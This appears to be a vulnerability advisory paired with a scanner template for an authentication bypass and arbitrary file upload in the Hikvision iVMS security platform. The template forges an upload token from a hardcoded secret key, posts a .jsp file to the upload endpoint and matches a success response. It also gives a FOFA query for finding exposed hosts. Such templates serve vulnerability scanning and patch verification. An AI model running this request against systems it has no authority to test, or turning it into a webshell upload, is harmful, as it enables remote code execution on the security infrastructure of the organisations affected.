Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
PoC代码[已公开]
id: hikvision-ivms-file-upload-bypass
info:
name: Hikvison iVMS - File Upload Bypass
author: SleepingBag945
severity: critical
description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
reference:
- https://blog.csdn.net/qq_41904294/article/details/130807691
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-911494769"
tags: hikvision,ivms,intrusive,fileupload,auth-bypass,vuln
http:
- raw:
- |
POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="{{randstr}}.jsp"
Content-Type: image/jpeg
{{randstr}}
------WebKitFormBoundaryGEJwiloiPo%20
matchers:
- type: word
part: body
words:
- '"success":true'
- '"resourceName":'
condition: and
# digest: 4b0a00483046022100b5d391a30801fde156caac83d0ff506f272fe5d39089d713a70dce26233da0ea022100935a8c66ddd19db824da12d361ee75871d6ac30dcbb7ff2e9d6181dbbd5ac577:922c64590222798bb761d5b6d8e72950